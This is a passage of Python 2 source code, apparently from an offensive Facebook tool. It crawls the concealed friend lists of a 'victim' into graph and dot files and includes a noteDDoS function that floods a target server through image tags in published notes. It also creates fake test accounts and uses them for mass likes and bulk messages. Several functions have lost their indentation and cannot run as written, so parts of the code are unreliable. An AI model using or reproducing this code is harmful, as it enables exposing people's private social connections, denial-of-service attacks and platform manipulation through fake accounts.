                    result = coreFriendshipPrivacy(victim,friends)
                    state = False
                except signalCaught as e:
                    state = False
                    print 'Signal Caught handler'
                    print '%s ' %e.args[0]
                    return
                except:
                    print '\r                                                                   \r',
                    raw_input('\rCheck the internet connection please..\r'),
            #Stores non repetitive values in the disclosed friends container
            for element in result:
                if element not in friendships:
                    friendships.append(element)
            #Stores every single value of friendships list alredy analyzed for non repetitivness
            visited.append(friends)
    #Check if the file exists, if true append, else create and writes
    try:
        friendshipFile = open( os.path.join("dumps",victim+".txt") ,"ab")
    except:
        friendshipFile = open( os.path.join("dumps",victim+".txt") ,"wb")
    #Stores every userID for further analyzis
    for friends in friendships:
        friendshipFile.write(str(friends)+'\n')
    friendshipFile.close()
def corePagesLike(victim,transitive):
    """Return page ids liked in common by *victim* and *transitive*.

    Scrapes the "?and=<transitive>&sk=favorites" intersection view,
    collects each line containing 'fbStreamTimelineFavInfoContainer', and
    extracts every 'page.php?id=<id>' it holds.  Network errors are
    re-raised for the caller to handle.  Returns a list of page-id strings.
    """
    matchs = []
    begin = 0
    page = []
    try:
        response = br.open('https://www.facebook.com/'+str(victim)+'?and='+str(transitive)+'&sk=favorites')
        resultado = response.read()
        match = re.search('timelineFriendsColumnHeader',resultado)
        if match is not None:
            linea = re.search('timelineFriendsColumnHeader(.+)',resultado).group()
    except mechanize.HTTPError as e:
        print e.code
        #Should handle a custom error
        raise
    except mechanize.URLError as e:
        print e.reason.args
        #Should handle a custom error
        raise
    #Error connection the upper function will catch the exception
    except:
        raise
    # Collect every favourites container up to its end-of-line.
    while True:
        match = re.search('fbStreamTimelineFavInfoContainer',resultado[begin:])
        if match != None:
            matchEnd = re.search('\n',resultado[begin+match.start():])
            if matchEnd != None:
                matchs.append(resultado[begin+match.start():matchEnd.end()+begin+match.start()])
                begin = matchEnd.end()+begin+match.start()
                match = None
                matchEnd = None
        else:
            break
    for linea in matchs:
        start = 0
        try:
            #Search the string to get the position of the starting match
            matchAnd = re.search('page\.php\?id=',linea[start:])
            #Search the end of the match for taking the id length
            matchEnd = re.search('">',linea[start+matchAnd.end():])
            #If we have a start and an end, we have the id value
        except:
            # NOTE(review): when the first search finds nothing, matchAnd is
            # None and .end() raises, so matchEnd may be unbound below —
            # NameError risk on the next line; confirm intended behavior.
            print 'ERROR'
        if (matchAnd and matchEnd) is not None:
            #Appends the value given the proper position (resolved a few lines up)
            page.append(linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end() ])
            #Moves the pointer for next match
            start += matchEnd.start()+matchAnd.end()
    return page
def checkPrivacy(victim):
    """Probe whether *victim*'s full friend list is publicly visible.

    Fetches the "?sk=friends" tab and looks for the "All Friends" header
    in English or Spanish.  If found, returns the raw HTML fragment after
    the '_1qp6' marker (the friends block) for further parsing; returns
    -1 when the list is private or on any error.
    """
    try:
        response = br.open('https://www.facebook.com/'+str(victim)+'?sk=friends')
        resultado = response.read()
        match = re.search('All Friends',resultado)
        matchBis = re.search('Todos los amigos',resultado)
        matchBisBis = re.search('Todos mis amigos',resultado)
        if ((match is not None) or (matchBis is not None) or (matchBisBis is not None)):
            matchFriends = re.search('_1qp6(.+)"',resultado).group()
            return matchFriends
        else:
            return -1
    except:
        print 'Error in the process, brute force will be applied ..'
        return -1
def simpleGraph(friends, victim):
    """Build and plot a one-hop friendship graph from a known friend list.

    For each entry of *friends* (already-disclosed friends of *victim*),
    fetches its mutual friends via coreFriendshipPrivacy() and adds
    victim--friend and friend--mutual edges to a networkx graph.  Ids are
    appended to dumps/<victim>/<victim>.txt, the adjacency matrix is
    pickled via saveObjects(), and spring-layout plots (.pdf/.png/.dot)
    are written under dumps/<victim>/.  Returns None.
    """
    coleccion = {}
    nodeID = 0
    root = 'dumps'
    directory = str(victim)
    mkdir(directory,root)
    myGraph = nx.Graph()
    # Node 0 represents the victim.
    coleccion[victim] = nodeID
    victima = nodeID
    myGraph.add_node(victima)
    nodeID += 1
    #Check if the file exists, if true append, else create and writes
    try:
        friendshipFile = open( os.path.join(root,directory,victim+".txt"),"ab")
    except:
        friendshipFile = open( os.path.join(root,directory,victim+".txt"),"wb")
    for friend in friends:
        friendshipFile.write(str(friend)+'\n')
        try:
            mutual = coreFriendshipPrivacy(victim, friend)
        except:
            # Skip friends whose mutual list could not be fetched.
            continue
        coleccion[friend] = nodeID
        nodeID += 1
        if myGraph.has_node(friend) != True:
            myGraph.add_node(friend)
        if myGraph.has_edge(victima, friend) != True:
            myGraph.add_edge(victima, friend)
        for element in mutual:
            if myGraph.has_node(element) != True:
                myGraph.add_node(element)
            myGraph.add_edge(element, friend)
    friendshipFile.close()
    mkdir('objects', os.path.join(root,directory))
    A = nx.adj_matrix(myGraph)
    saveObjects(victim, A, coleccion)
    nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=True)
    plt.savefig( os.path.join(root,directory,victim+"graph_color.pdf") )
    plt.savefig( os.path.join(root,directory,victim+"graph_color.png") )
    write_dot(myGraph,os.path.join(root,directory,victim+"graph_color.dot"))
    plt.show()
def friendshipPlot(text,victim):
friends = []
friendsID = []
counter = 0
lastId = 0
count = 0
while counter < 4:
matchStart = re.search("_5q6s _8o _8t lfloat _ohe\" href=\"https://www.facebook.com/",text)
if matchStart is not None:
start = matchStart.end()
matchEnd = re.search("\?",text[start:])
name = text[start:matchEnd.start()+start]
if (name not in friends) and (name != "profile.php"):
friends.append(name)
fbid = getUserID(name)
if fbid is not -1:
friendsID.append(fbid)
count += 1
flush()
print "\rFriends enumerated: %d" %count,
text = text[matchEnd.start()+start:]
else:
try:
c_user = getC_user()
userId = getUserID(victim)
if getUserID(friends[len(friends)-1]) == lastId:
counter += 1
lastId = getUserID(friends[len(friends)-1])
encoded = b64encode('0:not_structured:'+str(lastId))
response = br.open('https://www.facebook.com/ajax/pagelet/generic.php/AllFriendsAppCollectionPagelet?data={"collection_token":"'+userId+':2356318349:2","cursor":"'+encoded+'","tab_key":"friends","profile_id":'+userId+',"q":"'+victim+'","overview":false,"ftid":null,"order":null,"sk":"friends","importer_state":null}&__user='+c_user+'&__a=1&__dyn=7n8apij2qmp5zpQ9UoHbgWyxi9ACwKyaF299qzCAjFDxCm&__req=7&__rev=1183274')
to_parse = str(response.read()).strip('for (;;);')
try:
#Converts the json web response to a python like object
json_dump = json.loads(to_parse)
text = json_dump["payload"]
except:
print 'Error on json loading'
except:
print 'ERROR MOTHER FUCKER'
return friendsID, friends
def coreFriendshipPrivacy(victim,transitive):
    """Return the ids of mutual friends of *victim* and *transitive*.

    Scrapes the "?and=<transitive>&sk=friends" intersection view,
    extracting every 'user.php?id=<id>' from the line that follows the
    'timelineFriendsColumnHeader' marker.  When the page offers an AJAX
    "see more" list, merges in the extended results from seeMore().
    Network errors are re-raised for the caller.  Returns a list of
    unique user-id strings.
    """
    friends = []
    try:
        response = br.open('https://www.facebook.com/'+str(victim)+'?and='+str(transitive)+'&sk=friends')
        resultado = response.read()
        match = re.search('timelineFriendsColumnHeader',resultado)
        if match is not None:
            linea = re.search('timelineFriendsColumnHeader(.+)',resultado).group()
        # NOTE(review): if the marker is absent, 'linea' stays unbound and
        # the loop below raises NameError on its first iteration, which the
        # except branch then treats as end-of-matches — confirm intended.
    except mechanize.HTTPError as e:
        print e.code
        #Should handle a custom error
        raise
    except mechanize.URLError as e:
        print e.reason.args
        #Should handle a custom error
        raise
    #Error connection the upper function will catch the exception
    except:
        raise
    #Offset for the string search
    start = 0
    #While line matches the searched values
    while True:
        try:
            #Search the string to get the position of the starting match
            matchAnd = re.search('user\.php\?id=',linea[start:])
            #Search the end of the match for taking the id length
            matchEnd = re.search('&',linea[start+matchAnd.end():])
            #If we have a start and an end, we have the id value
            if (matchAnd and matchEnd) is not None:
                #Appends the value given the proper position (resolved a few lines up)
                toUserID = linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end()]
                if toUserID not in friends:
                    friends.append(toUserID)
                #Moves the pointer for next match
                start += matchEnd.start()+matchAnd.end()
        #If the match ends (Equals of end of the line for the search)
        except:
            #Search for more friends (Ajax controled)
            match = re.search('/ajax/browser/list/mutualfriends/',resultado)
            if match is not None:
                #Call for the extendend friend search module
                extend = seeMore(len(friends),victim,transitive)
                #Return the merge of the lists
                return list(set(extend + friends))
            else:
                #In case there are no more friends, returns the original list
                return friends
def seeMore(start,victim,transitive):
#vitimId and transitiveId needs to be IDS, instead of usernames. Is like a cast from the username to the Id
#doesn't matter if the given argument is already the id.
victimId = getUserID(victim)
transitiveId = getUserID(transitive)
#Disclosed friends container
extendedFriends = []
if (victimId == -1) or (transitiveId == -1):
return extendedFriends
#While there friends to disclosed in the particular union set
while True:
try:
response = br.open('https://www.facebook.com/ajax/browser/list/mutualfriends/?uid='+str(transitiveId)+'&view=grid&location=other&infinitescroll=0&short=1&node='+str(victimId)+'&start='+str(start)+'&__user='+str(getC_user())+'&__a=1&__dyn=7n8ahyj35zolgDxqihXzA&__req=6')
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
raise
#Strips the web response for further processes
to_parse = str(response.read()).strip('for (;;);')
try:
#Converts the json web response to a python like object
json_dump = json.loads(to_parse)
except:
print 'Error on json loading'
#For non-blocking excecution - The upper function is excpecting a list to be returned
return extendedFriends
#Offset represents the start offset for non-repetition purpose
offset = 0
#Controls the end of the module excecution
NoneFlag = True
#Search for friends to be added
for element in range(len(json_dump['jsmods']['require'])):
if json_dump['jsmods']['require'][element][0] == unicode('AddFriendButton'):
NoneFlag = False
offset += 1
extendedFriends.append(json_dump['jsmods']['require'][element][3][1])
#If no friend was added, the excecution ends
if NoneFlag:
break
#Increments offset from the start in the search
start += offset
#End of the while, returns the new list
return extendedFriends
def getUserID(user):
#Grabs the user Id using the OpenGraph
try:
response = br.open('https://www.facebook.com/'+str(user))
data = response.read()
#json_dump = json.loads(resultado)
#try:
# return json_dump['id']
#except:
# return -1
except mechanize.HTTPError as e:
print e.code
return -1
except mechanize.URLError as e:
print e.reason.args
return -1
try:
match = re.search("fb://profile/",data)
if match is not None:
start = match.end()
matchBis = re.search('"',data[start:])
if matchBis is not None:
return data[start:start+matchBis.start()]
except:
return user
def logs(messagelog):
logging.basicConfig(filename=os.path.join("logs","error.log"), level=logging.NOTSET, format='')
cTime = ctime(time())
log = str(cTime) + ' : ' + str(messagelog)
logging.debug(log)
def dotFile(victim, transitive):
    """Crawl *victim*'s friend graph and emit it as a Graphviz dot file.

    Same breadth-first expansion as bypassFriendshipPrivacy() — seeded
    with the known friend *transitive*, expanded via
    coreFriendshipPrivacy() — but writes '"a" -> "b";' edges with
    display names (getName) to dumps/<victim>/<victim>_dot.dot instead of
    building a networkx graph.  Resumable through <victim>.txt.
    Returns None.
    """
    root = 'dumps'
    directory = str(victim)
    mkdir(directory,root)
    myGraph = open( os.path.join(root,directory,victim+"_dot.dot") ,"wb")
    # NOTE(review): edges are written with '->' inside a 'Graph {' block;
    # Graphviz expects '--' for undirected graphs — confirm the consumer.
    myGraph.write('Graph {\n')
    #Percentage container
    percentage = 0.0
    #Disclosude friends container
    friendships = []
    #Already visited nodes container
    visited = []
    try:
        #If the file already exists
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"rb")
        #Reads every line of the file
        while True:
            linea = friendshipFile.readline()
            if not linea:
                break
            #Store in the visited array for non repetition
            visited.append(linea.strip("\n\r"))
        friendshipFile.close()
    except:
        #If the file does not exists, creates the file
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
        friendshipFile.close()
    try:
        #Generates the first level of the search
        result = coreFriendshipPrivacy(victim,transitive)
    except:
        print 'Check the internet connection please..'
        return
    #Stores non repetitive values in the disclosed friends container
    transitivo = getName(transitive)
    for individuos in result:
        if individuos not in visited:
            chabon = getName(individuos)
            myGraph.write('    "'+transitivo + '" -> "' + chabon + '";\n')
            friendships.append(individuos)
    visited.append(getUserID(transitive))
    #Counter for percentage calculus purpose
    i = 0.0
    #flush
    print '\r                                                                   \r',
    #For every value in the first disclosed list, repeats until every value has been tried
    for friends in friendships:
        #Percentage calculus
        percentage = (i * 100.0)/len(friendships)
        flush()
        print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
        i+=1
        #Only if the node wasn't visited
        if friends not in visited:
            #if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state will still be True.
            #Only if the try passes, the infinite while will end. (For internet error connection problem)
            state = True
            while state == True:
                try:
                    result = coreFriendshipPrivacy(victim,friends)
                    state = False
                except signalCaught as e:
                    state = False
                    print 'Signal Caught handler'
                    print '%s ' %e.args[0]
                    return
                except:
                    logs('Check the internet connection please.. Press enter when it\'s done')
                    print '\r                                                                   \r',
                    a = raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r')
                    # Hidden escape hatches: '1' skips this node, '2' re-logs in.
                    if a == 1:
                        state = False
                    else:
                        if a == 2:
                            email,password = setMail()
                            login(email,password,'real')
            #Stores non repetitive values in the disclosed friends container
            friendName = getName(friends)
            for element in result:
                if element not in friendships:
                    transitive = getName(element)
                    myGraph.write('    "'+friendName + '" -> "' + transitive + '";\n')
                    friendships.append(element)
            #Stores every single value of friendships list already analysed for non repetitiveness
            visited.append(friends)
    #Check if the file exists, if true append, else create and writes
    try:
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"ab")
    except:
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
    #Stores every userID for further analysis
    for friends in friendships:
        transitivo = getName(friends)
        myGraph.write('    "'+victim + '" -> "' + transitivo + '";\n')
        friendshipFile.write(str(friends)+'\n')
    myGraph.write('}')
    friendshipFile.close()
    myGraph.close()
def simpleDotGraph(friends, victim):
    """Emit a one-hop friendship graph of *victim* as a Graphviz dot file.

    Dot-file counterpart of simpleGraph(): for each known friend, writes a
    victim -> friend edge plus friend -> mutual edges (mutuals obtained via
    coreFriendshipPrivacy(), names via getName()) to
    dumps/<victim>/<victim>_dot.dot, and saves the raw ids to
    <victim>.txt.  Returns None.
    """
    root = 'dumps'
    directory = str(victim)
    mkdir(directory,root)
    myGraph = open( os.path.join(root,directory,victim+"_dot.dot"),"wb")
    myGraph.write('Graph {\n')
    friendshipFile = open( os.path.join(root,directory,victim+".txt"),"wb")
    for friend in friends:
        friendshipFile.write(str(friend)+'\n')
    friendshipFile.close()
    for friend in friends:
        try:
            mutual = coreFriendshipPrivacy(victim, friend)
        except:
            # Skip friends whose mutual list could not be fetched.
            continue
        transitive = getName(friend)
        myGraph.write('    "'+victim + '" -> "' + transitive + '";\n')
        for element in mutual:
            mutualFriend = getName(element)
            myGraph.write('    "'+transitive + '" -> "' + mutualFriend + '";\n')
    myGraph.write('}')
    myGraph.close()
def noteDDoS(imageURL,noteID, privacy):
    """Publish a Facebook note stuffed with externally hosted image tags.

    Interactively asks for a parameter range, a title and a preview text,
    then builds note HTML embedding '<imageURL>?file=<i>' for each i in
    the range, so every viewer of the note requests each URL from the
    target server (traffic amplification).  Publishes through the
    /ajax/notes/edit endpoint with the given audience *privacy*.
    Network errors are printed; unexpected errors are logged and re-raised.
    """
    fb_dtsg = set_dtsg()
    if (fb_dtsg == 0):
        print 'ERROR MOTHER FUCKER -_-'
    j = int(raw_input('starting parameter number? (img.jpg?file=number) : '))
    amount = int(raw_input('last parameter number? (img.jpg?file=number) : '))
    title = raw_input('Note title: ')
    content = '<p>' + raw_input('Note preview text: ') + '</p>'
    # One <img> per parameter value; each triggers a request to imageURL.
    for i in range(j,int(amount)):
        content += '<p><img src="'+imageURL+'?file='+str(i)+'"></img></p>'
    arguments = {
        'fb_dtsg' : fb_dtsg,
        'object_id' : noteID,
        'note_id' : noteID,
        'id' : getC_user(),
        'title' : title,
        'note_content' : content,
        'audience['+noteID+'][value]' : privacy,
        'publish' : 'Publish',
        '__user' : getC_user(),
        '__a' : '1',
        '__dyn' : '7n8ahyj34fzpQ9UoHaEWy1m9ACwKyaF3pqzCAjFDxCm6qyE',
        '__req' : '7',
        'ttstamp' : '2658169897154120115496511690',
        '__rev' : '1224624'
    }
    datos = urlencode(arguments)
    try:
        response = br.open('https://www.facebook.com/ajax/notes/edit',datos)
    except mechanize.HTTPError as e:
        logs(e.code)
        print e.code
    except mechanize.URLError as e:
        logs(e.reason.args)
        print e.reason.args
    except:
        logs('Error in the DDoS module')
        print '\rError in the DDoS module\r'
        raise
def devTest(appID):
    """Create a batch of test users for Facebook app *appID*.

    POSTs to the developers.facebook.com async test-user creation endpoint
    ('count' : '4' — four users per call) using the session's fb_dtsg
    token.  Network errors are printed and logged; unexpected errors are
    logged and re-raised.
    """
    try:
        fb_dtsg = set_dtsg()
        if (fb_dtsg == 0):
            print 'ERROR MOTHER FUCKER -_-'
        # Touch the developers site first so the session context is set.
        br.open('https://developers.facebook.com/').read()
        arguments = {
            'fb_dtsg' : fb_dtsg,
            'count' : '4',
            'app_id' : str(appID),
            'install_app' : '1',
            'platform_version' : 'v2.0',
            'enable_ticker' : '1',
            'language' : 'en_US',
            '__user' : getC_user(),
            '__a' : '1',
            '__dyn' : '7w86i1PyUnxqnFwn8',
            '__req' : '3',
            'ttstamp' : '2658172110116109767311810511273',
            '__rev' : '1262242'
        }
        datos = urlencode(arguments)
        response = br.open('https://developers.facebook.com/apps/async/test-users/create/',datos)
    except mechanize.HTTPError as e:
        logs(e.code)
        print e.code
    except mechanize.URLError as e:
        logs(e.reason.args)
        print e.reason.args
    except:
        logs('Error in devTest module')
        print '\rError in devTest module\r'
        raise
# Legacy HTML-scraping implementation of getTest(), disabled by wrapping it
# in a module-level string literal; superseded by the JSON paging version
# defined below.  Kept for reference only.
'''
def getTest(appID):
    try:
        response = br.open('https://developers.facebook.com/apps/'+appID+'/roles/test-users/')
        linea = response.read()
        lines = []
        match = re.search('test_users'+'(.+)',linea)
        if match is not None:
            encontrada = match.group()
            start = 0
            while True:
                matchstart = re.search('test_user_ids',encontrada[start:])
                if matchstart is not None:
                    matchend = re.search('\.net',encontrada[start+matchstart.end():])
                    if (matchstart is not None) and (matchend is not None):
                        final = encontrada[start+matchstart.start() : matchend.end()+start+matchstart.end()]
                        lines.append(final)
                        start = start+matchstart.start()+matchend.end()
                else:
                    break
            email = []
            name = []
            userid = []
            for linea in lines:
                matchstart =re.search('value="',linea)
                matchend = re.search('"',linea[matchstart.end():])
                userid.append(linea[matchstart.end():matchstart.end()+matchend.start()])
            for linea in lines:
                start=0
                while True:
                    matchstart = re.search("\"_50f4\">",linea[start:])
                    if matchstart is not None:
                        matchend = re.search('</span>',linea[start+matchstart.end():])
                        if (matchstart is not None) and (matchend is not None):
                            final = linea[start+matchstart.end() : matchend.start()+start+matchstart.end()]
                            name.append(final)
                            start = start+matchstart.start()+matchend.end()
                            matchstart = re.search("_5jxf\"><span class=\"_50f4\">",linea[start:])
                            if matchstart is not None:
                                email.append(linea[matchstart.end()+start:].replace('&#064;','@'))
                                break
                            else:
                                print 'error'
                    else:
                        break
            for elements in email:
                print elements
            for elements in name:
                print elements
            for elements in userid:
                print elements
    except mechanize.HTTPError as e:
        logs(e.code)
        print e.code
    except mechanize.URLError as e:
        logs(e.reason.args)
        print e.reason.args
    except:
        logs('Error in getTest module')
        print '\rError in getTest module\r'
        raise
'''
def getTest(appID):
    """List the existing test users of Facebook app *appID*.

    Pages through the developers.facebook.com test-users paging endpoint
    in steps of 20, handing each JSON payload to MyParser.parceros()
    (which presumably prints/stores the entries and returns -1 when a
    page is empty — TODO confirm).  Stops on the first request/parse
    failure or when the parser signals the end.  Returns None.
    """
    try:
        start = 0
        flag = 0
        while flag != -1:
            fb_dtsg = set_dtsg()
            if (fb_dtsg == 0):
                print 'ERROR MOTHER FUCKER -_-'
            arguments = {
                'start' : str(start),
                '__user' : getC_user(),
                '__a' : '1',
                '__dyn' : '7w86i1PyUnxqnFwn8',
                '__req' : '4',
                'fb_dtsg' : fb_dtsg,
                'ttstamp' : '26581707111311350113871144898',
                '__rev' : '1262242'
            }
            datos = urlencode(arguments)
            try:
                response = br.open('https://developers.facebook.com/apps/'+appID+'/roles/test-users/paging/',datos)
                aParsear = response.read().strip("for (;;);")
                json_dump = json.loads(aParsear)
                flag = MyParser.parceros(json_dump)
                start+=20
            except:
                break
    except:
        print 'general error'
def changePassword(appID):
    """Reset the password of every not-yet-logged test user of *appID*.

    Iterates the users returned by database.getUsers(); for each one that
    is also in database.getUsersNotLogged(), POSTs the async test-user
    edit endpoint setting the password to '1234567890'.  Assumes each
    'persona' record is indexable as (id, name, ...) — TODO confirm the
    database schema.  All errors are printed and swallowed.  Returns None.
    """
    people = database.getUsers()
    peopleLogged = database.getUsersNotLogged()
    for persona in people:
        if persona in peopleLogged:
            try:
                fb_dtsg = set_dtsg()
                if (fb_dtsg == 0):
                    print 'ERROR MOTHER FUCKER -_-'
                arguments = {
                    'fb_dtsg' : fb_dtsg,
                    'name' : str(persona[1]),
                    'password' : '1234567890',
                    'confirm_password' : '1234567890',
                    '__user' : getC_user(),
                    '__a' : '1',
                    '__dyn' : '7w86i1PyUnxqnFwn8',
                    '__req' : 'a',
                    'ttstamp' : '26581698582558910610211811276',
                    '__rev' : '1262776'
                }
                datos = urlencode(arguments)
                try:
                    response = br.open('https://developers.facebook.com/apps/async/test-users/edit/?app_id='+appID+'&test_user_id='+str(persona[0]),datos)
                except:
                    print 'error'
            except:
                print 'Error General'
def likeDev(postId):
signal.signal(signal.SIGINT, signal_handler)
try:
#Cookie of the real account
masterCookie = cj._cookies
massLoginTest()
if len(cookieArray) == 0:
print 'First you must create accounts: option 1) '
quantity = raw_input('Insert the amount of likes: ')
while int(quantity) <= 0 or int(quantity) >= len(cookieArray):
print 'Wrong quantity. First you must create enough accounts for that amount of likes .. (option 1) ..'
quantity = raw_input('Insert the amount of likes: ')
#Percentage container
percentage = 0.0
j = 0.0
total = int(quantity) * len(postId)
#flush
print '\r \r',
for i in range(int(quantity)):
for post in range(len(postId)):
cj._cookies = cookieArray[i]
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'like_action' : 'true',
'ft_ent_identifier' : str(postId[post]),
'source' : '0',
'client_id' : str(c_user)+'%3A4047576437',
'rootid' : 'u_0_2o',
'giftoccasion' : '',
'ft[tn]' : '%3E%3D',
'ft[type]' : '20',
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ahyj35ym3KiA',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816595797611370260',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/ufi/like.php',datos)
if globalLogging:
logs(response.read())
percentage = (j * 100.0)/total
flush()
print '\r[%.2f%%] of likes completed\r' %(percentage),
j+=1
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Unknown error'
cj._cookies = masterCookie
raw_input('Finished like() module, press enter to continue')
except signalCaught as e:
deleteUser()
message = '%s catch from create module' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def massMessage(page,message):
import random
massLoginTest()
if len(cookieArray) == 0:
print 'First you must create accounts: option 1) '
return
pageID = getUserID(page)
for i in range(len(cookieArray)):
try:
cj._cookies = cookieArray[i]
c_user = getC_user()
print str(c_user)+'\n'
numero = ''
numero2 = ''
for i in range(10):
numero += str(random.randrange(0,10))
for i in range(10):
numero2 += str(random.randrange(0,10))
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][timestamp]' : '1401416840784',
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : '11:27pm',
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'false',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:'+pageID,
'message_batch[0][specific_to_list][1]' : 'fbid:'+c_user,
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1401416840784:'+numero+'-'+numero2+'@mail.projektitan.com>',
'''<1401416840784:554304545-874733751@mail.projektitan.com>','''
'message_batch[0][client_thread_id]' : 'user:'+pageID,
'client' : 'mercury',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ajEAMCBynUKt2u6aOGeExEW9ACxO4pbGA8AGGBy6C-Cu6popDFp4qu',
'__req' : 'q',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581697273111715585898748',
'__rev' : '1268876'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de massMessage()')
print 'Error en el modulo de massMessage()\n'
def logTestUser(testUser):
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'user_id' : testUser,
'__user' : c_user,
'__a' : '1',
'__dyn' : '7w86i3S2e4oK4pomXWo4CE-',
'__req' : '2',
'ttstamp' : '2658172826512290796710073107',
'__rev' : '1270592',
'fb_dtsg' : fb_dtsg,
}
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/checkpoint/async/test-user-login/dialog/',datos)
dump = json.loads(response.read().strip("for (;;);"))
line = dump['jsmods']['markup'][0][1]['__html']
match= re.search('\"n\"',line)
if match != None:
matchBis = re.search('value=\"',line[match.end():])
matchBisBis = re.search('"',line[match.end()+matchBis.end():])
code = line[match.end()+matchBis.end():match.end()+matchBis.end()+matchBisBis.start()]
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments['fb_dtsg'] = fb_dtsg
arguments['n'] = str(code)
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/checkpoint/async/test-user-login/',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
def massLoginTest():
import copy
i = int(0)
people = database.getUsersNotLogged()
#Flush
print '\r \r',
masterCj = copy.deepcopy(cj._cookies)
loadPersistentCookie()
for person in people:
#login
try:
cj._cookies = copy.deepcopy(masterCj)
if person[4] == 0:
logTestUser(str(person[0]))
cookieArray.append(cj._cookies)
print cj._cookies #DEBUG
cj.clear()
#percentage
i+=1
percentage = (i * 100.0) / len(people)
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
except:
print 'Error with user %s' %person[0]
continue
cj.clear()
savePersistentCookie()
def plotDOT(victim):
root = 'dumps'
directory = victim
mkdir(directory,root)
graph = open(root+"\\"+directory+"\\"+victim+"_graph.dot","wb")
graph.write("Graph {\n")
victim = victim.replace(".","_")
nodes = database.getNodes(victim)
for node in nodes:
graph.write(" "+victim.replace("_",".")+" -> "+node[0]+";\n")
edges = database.getEdges(victim,node[0],node[1])
try:
edgeList = edges[0][2].split(';')
writed = []
for individual in edgeList:
if individual != "" and individual not in writed:
graph.write(" "+node[0]+" -> "+str(individual)+";\n")
writed.append(individual)
except:
print 'No edges for %s' %node[0]
graph.write("}")
graph.close()
def dotFileDatabase(victim, transitive):
#Percentage container
percentage = 0.0
#Disclosude friends container
friendships = []
#Already visited nodes container
visited = []
try:
#Generates the first level of the search
result = coreFriendshipPrivacy(victim,transitive)
except:
print 'Check the internet connection please..'
return
#Stores non repetitive values in the disclosed friends container
transitivo = getName(transitive)
transitivoID = getUserID(transitive)
if transitivoID == -1:
transitivoID = transitivo
database.addNode(victim,transitivo, transitivoID)
for individuos in result:
friendName = getName(individuos)
friendId = getUserID(individuos)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendName, friendId)
database.addEdge(victim,transitivo, transitivoID, friendName, friendId)
friendships.append(individuos)
#Counter for percentage calculus purpose
i = 0.0
#flush
print '\r \r',
#For every value in the first disclosed list, repeats until every value has been tryed
for friends in friendships:
#Percentage calculus
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
#Only if the node wasn't visited
if friends not in visited:
#if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True.
#Only if the try passes, the infinite while will end. (For internet error connection problem)
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
logs('Check the internet connection please.. Press enter when it\'s done')
print '\r \r',
a = raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r')
if a == 1:
state = False
else:
if a == 2:
email,password = setMail()
login(email,password,'real')
#Stores non repetitive values in the disclosed friends container
friendName = getName(friends)
friendId = getUserID(friends)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendName, friendId)
for element in result:
if element not in friendships:
friendTran = getName(element)
friendTranId = getUserID(element)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendTran, friendTranId)
database.addEdge(victim,friendName, friendId, friendTran, friendTranId)
friendships.append(element)
#Stores every single value of friendships list alredy analyzed for non repetitivness
visited.append(friends)
def simpleDotGraphDatabase(friends, victim):
for friend in friends:
try:
